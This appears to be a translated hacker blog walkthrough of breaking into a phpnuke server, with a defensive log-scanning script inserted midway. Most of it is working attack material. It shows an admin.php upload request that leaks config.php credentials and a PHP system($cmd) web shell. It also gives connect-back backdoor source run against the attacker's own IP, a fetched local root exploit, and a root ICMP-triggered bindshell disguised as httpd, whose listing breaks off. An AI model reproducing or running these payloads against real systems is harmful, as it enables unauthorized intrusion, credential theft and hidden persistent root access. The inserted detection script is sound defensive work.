Learning how to abuse a phpnuke vulnerability
Ah, it's the holidays. Come to think of it, I've drifted through half my life and still never broken into a Unix box. On Xfocus (焦点) I saw the fine article "How san did bad things with phpnuke's vulnerability", and I figured I should study it.
I searched Google for admin.php (search around a lot; this will take a long time). Ha~~ I spotted cshu.51.net/admin.php? (a fake address, of course; who would do this work from their own nest?). That brings up the admin login screen. In IE I pasted:
cshu.51.net/admin.php?upload=1&file=config.php&file_name=cshu.txt&wdir=/images/&userfile=config.php&userfile_name=cshu.txt
———— Working over a modem is so slow! (While waiting, let me explain what the stuff above means: it copies phpnuke's configuration file to /images/cshu.txt.) See the filemanager screen? That is the file-upload interface. But (here comes the most annoying part) sometimes error messages appear at the top of the page. That usually means /images/ is not writable. What to do? Find a directory that is writable by changing the wdir= part, for example wdir=/images/xxxxx/dddd or wdir=/../xxx/; with ../../../../ you can see every directory the nobody account can see. The directory you find must also be reachable with IE, though. Finding such a directory cost me 1.8 yuan (one hour). Once it works you will see a file cshu.txt in that directory; open it at cshu.51.net/xxx/images/cshu.txt
Excerpt:
$AllowableHTML = array("p"=>2, "b"=>1, "i"=>1, "a"=>2, "em"=>1, "br"=>1,
"strong"=>1, "blockquote"=>1, "tt"=>1, "li"=>1, "ol"=>1, "ul"=>1);
######################################################################
(1=Yes 0=No This will display a new box in Statistics page with relevant server
info)
$Ephemerids = 0; $advancedstats = 0;
Naturally that includes the SQL password and other sensitive information. But I won't use it (believe me?). Then~~~ upload phpshell.php or cmd.cgi, whichever the server supports; I uploaded cmd.php
------------test1.php------------
echo"
";
system("$cmd");
echo"
";
?>
------------test1.php----------
Copied from san.
Enter cshu.51.net/xxx/images/cmd.php?cmd=id
See it?
uid=60001(nobody) gid=60001(nobody)
You can read passwd this way too, but who bothers cracking it nowadays?
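From the defender's side, the two request shapes the walkthrough above relies on (admin.php?upload=1 with file=config.php or a wdir= containing "..", and a .php file driven by a cmd= parameter) are easy to pick out of a web server access log. The following is an added detection example, not code from the original post or from phpnuke; the log lines are constructed samples in Apache common-log layout, and the tag names and the REQUEST_RE pattern are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic); IPs and paths are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2001:10:00:00 +0800] "GET /index.php HTTP/1.0" 200 512
10.0.0.7 - - [01/Feb/2001:10:01:00 +0800] "GET /admin.php?upload=1&file=config.php&file_name=cshu.txt&wdir=/images/&userfile=config.php&userfile_name=cshu.txt HTTP/1.0" 200 1024
10.0.0.7 - - [01/Feb/2001:10:02:00 +0800] "GET /admin.php?upload=1&file=config.php&file_name=cshu.txt&wdir=/../xxx/&userfile=config.php&userfile_name=cshu.txt HTTP/1.0" 200 1024
10.0.0.7 - - [01/Feb/2001:10:03:00 +0800] "GET /images/cmd.php?cmd=id HTTP/1.0" 200 60
10.0.0.7 - - [01/Feb/2001:10:04:00 +0800] "GET /images/cmd.php?cmd=cc%20-o%20back%20backdoor.c HTTP/1.0" 200 10
10.0.0.9 - - [01/Feb/2001:10:05:00 +0800] "GET /admin.php?op=login HTTP/1.0" 200 2048
"""

# Minimal common-log parser: client IP, timestamp, method, request URL, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Files whose contents should never be copied around through the upload handler.
SENSITIVE_FILES = {"config.php"}
# Query parameters that, on a .php target, usually mean a command shell was dropped.
CMD_PARAMS = {"cmd"}


def classify(url):
    """Return the list of alert tags for one request URL (empty when nothing matches)."""
    parts = urlsplit(url)
    path = parts.path.lower()
    qs = parse_qs(parts.query, keep_blank_values=True)  # values are already URL-decoded
    tags = []

    if path.endswith("admin.php") and "upload" in qs:
        # Source file names given to the upload/copy handler (both parameter spellings).
        sources = [s.rsplit("/", 1)[-1].lower()
                   for s in qs.get("file", []) + qs.get("userfile", [])]
        if any(s in SENSITIVE_FILES for s in sources):
            tags.append("admin-upload-reads-config")
        # A target directory walking upward is the "find a writable dir" trick.
        if any(".." in d for d in qs.get("wdir", [])):
            tags.append("admin-upload-wdir-traversal")

    if path.endswith(".php") and any(p in qs for p in CMD_PARAMS):
        tags.append("php-cmd-parameter")

    return tags


def scan(log_text):
    """Scan a whole log; return (ip, url, tags) for every line that raised a tag."""
    alerts = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected layout
        tags = classify(m.group("url"))
        if tags:
            alerts.append((m.group("ip"), m.group("url"), tags))
    return alerts


if __name__ == "__main__":
    for ip, url, tags in scan(SAMPLE_LOG):
        print(ip, ",".join(tags), url)
```

Run against the constructed sample, the two admin.php upload requests, the wdir traversal variant and both cmd.php calls are flagged, while the ordinary index and login requests are not. In practice the same rule set would be fed from the real access log, and a hit on admin-upload-reads-config is worth treating as a configuration (and database credential) disclosure.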
Let's upload a bindshell.
/*
**
** Digit-Labs Connect-Back Backdoor - digit-labs.org
**
**
** Use this backdoor to access machines behind
** firewalls.
**
** [step 1] -
** setup a listening port on your box e.g:
** >nc -l -p 4000
**
** [step 2] -
** Issue the following command:
** >./cbd
**
*/
int fd, sock;
int port = 4000; <--- can be changed
struct sockaddr_in addr;
char mesg[]= "\n[ Digit-Labs Connect-Back Backdoor ]\n \
* Connected to Commandline...\n";
char shell[] = "/bin/sh";
int main(int argc, char *argv[]) {
while(argc < 2) {
fprintf(stderr, "\n %s
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "httpd.", 0); "httpd." <--- can be changed, so nobody notices
close(fd);
return 1;
}
Not bad, eh? It even gets past firewalls.
Upload —————— backdoor.c
Open a window on my machine
c:\nc -l -vv -p 4000 \n
cshu.51.net/xxx/images/cmd.php?cmd=cc -o back backdoor.c
cshu.51.net/xxx/images/cmd.php?cmd=./back xxx.xxx.xx.xx (my ip)
Now look at my window
c:\nc -l -vv -p 4000
listening on [any] 4000 ...
connect to [*.*.*.*] from www.server.net [*.*.*.*] 2259
[ Digit-Labs Connect-Back Backdoor ]
* Connected to Commandline...
ls <----- familiar, right?
Don't forget we're still nobody!!!
w
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
Nobody around! (excited) Let's begin~~~
uname -a
Linux grasshopper.tellus.nl 2.2.17-21mdksecure #1 SMP Thu Oct 5 12:52:38 CEST
2000
i686 unknown
cd /usr/include/i586-mandrake-2.2.17/
Oh, it's Mandrake Linux.
Go to e4gle.org and find a local overflow program to try: http://e4gle.org/exploit/os/linux/mandrake/7.2/epcs2.c
Upload --------- epcs2.c
cc -o x epcs2.c
./x
bug exploited successfully.
nenjoy
cd /root
ls
README_FIRST
admin
Install a backdoor; let's use the one lion wrote.
,have a goodluck.:) \r\n====================================\r\n\r\nyour comman
d: \0"
void child_kill();
int bind_shell();
int main(int argc, char *argv[])
{
int s, size, fromlen;
char pkt[4096];
struct protoent *proto;
struct sockaddr_in from;
signal(SIGHUP,SIG_IGN);
signal(SIGCHLD, child_kill);
if (fork() != 0) exit(0);
proto = getprotobyname("icmp");
/* can't creat raw socket */
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0)
exit(0);
/* waiting for packets */
while(1)
{
strcpy (argv[0], HIDEME);
do
{
fromlen = sizeof(from);
if ((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *) &from, &fromlen)) < 0)
printf("", size-28);
} while (size != SIZEPACK + 28);
/* size == SIZEPACK, let's bind the shell on your port :)*/
switch(fork())
{
case -1:
continue;
case 0:
strcpy (argv[0], HIDEIDS);
bind_shell();
exit(0);
}
sleep(100);
}
}
void child_kill()
{
wait(NULL);
signal(SIGCHLD, child_kill);
}
int bind_shell()
{
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time;
char passwd[15];
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
chdir("/");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1)